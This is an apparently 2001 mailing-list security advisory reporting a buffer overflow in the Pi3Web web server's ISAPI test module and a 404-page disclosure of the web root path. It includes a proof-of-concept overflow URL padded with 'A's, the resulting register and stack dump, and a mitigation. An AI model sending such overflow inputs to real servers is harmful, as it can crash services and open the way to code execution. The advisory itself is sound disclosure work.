Vulnerabilities in Pi3Web Server

Thu, 15 Feb 2001 18:48:45 -0800 

----- Begin Hush Signed Message from [EMAIL PROTECTED] -----

Vulnerabilities in Pi3Web Server



    Overview

Pi3Web v1.0.1 is a web server available from http://www.zdnet.com.  A
vulnerability exists in the server's internal ISAPI handling procedures
which results in a buffer overflow.  The server also reveals the physical
path of the web root upon encountering a 404 error.



    Details


Here is an example URL that overflows a buffer in Pi3Web's executable:

        http://localhost/isapi/tstisapi.dll?[a lot of 'A's]

This results in the following crash:

ENHPI3 caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00000001 CS=017f EIP=41414141 EFLGS=00010206
EBX=0123d1b0 SS=0187 ESP=041df3b0 EBP=041dfed4
ECX=00000000 DS=0187 ESI=041df3f0 FS=3e6f
EDX=00000000 ES=0187 EDI=00000000 GS=0000
Bytes at CS:EIP:

Stack dump:
41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141
41414141 00bb0b2c 00000000 05611030


To discover the physical path of the web root:

        http://localhost/[any string which causes a 404 error]

The server responds with:

        The original URL path was:
        /sadfasdf

        The mapped physical path was:
        C:\PI3WEB\WebRoot\sadfasdf




    Solution

The buffer overflow can be prevented by deleting the ISAPI module named
'tstisapi.dll'.  There is no quick solution for the web root disclosure.



    Vendor Status

The author, John Roy, was contacted via <[EMAIL PROTECTED]> on Monday,
February 5, 2001.  No reply was received.



    - Joe Testa  ( e-mail: [EMAIL PROTECTED] / AIM: LordSpankatron )


----- Begin Hush Signature v1.3 -----
B2izikZHXZBSe741WqgWmHVTt5g5goAcqJzAz0tPWIrMzvB0fUWonV8Q6SUq4x4PTs+t
Fqyz4+UGHO1T/IunO4J4uML1McFFFDLqSXJDyeZYd6ZvryQzRY+6WEeaBEVFFLI5X+yq
F/nobN22dvqdFHrJ9PVBdYa88NieXkpAY1el3gHXiaGqYcWM1lMoub5WttkwNx9Irzpb
CJlaASStNBTRBkSn84x5YkgDOgiANl7VafyNamn3X3uhJ5SHghXnUCvpueGKj6Yna9Dv
wKHdyV3pg2r/UiFOfx7fy4BC5L8VOSsQZl420F1rBLxdwpnqqU3g8yiTsSs2HxG3arIF
/xxa9llCxo+zKaGppx/6HGIhF8k2S6qfJcYlgmd5YhdQWMuH0A/XQhqxIGNxgJ6nY7mU
qbAW7gyoXV0OFYQivjHzq6zaLE8Q7uGqBodkF/CkvbuXSAeENgECSew5bz2EblGV1Ymb
6VlmOeX5w964o01o2/2v+oFNItGYbD9N9LkHNSwNjwH4
----- End Hush Signature v1.3 -----
\n\nThis message has been signed with a Hush Digital Signature. \nTo verify the 
signature, please go to www.hush.com/tools\n\n

Reply via email to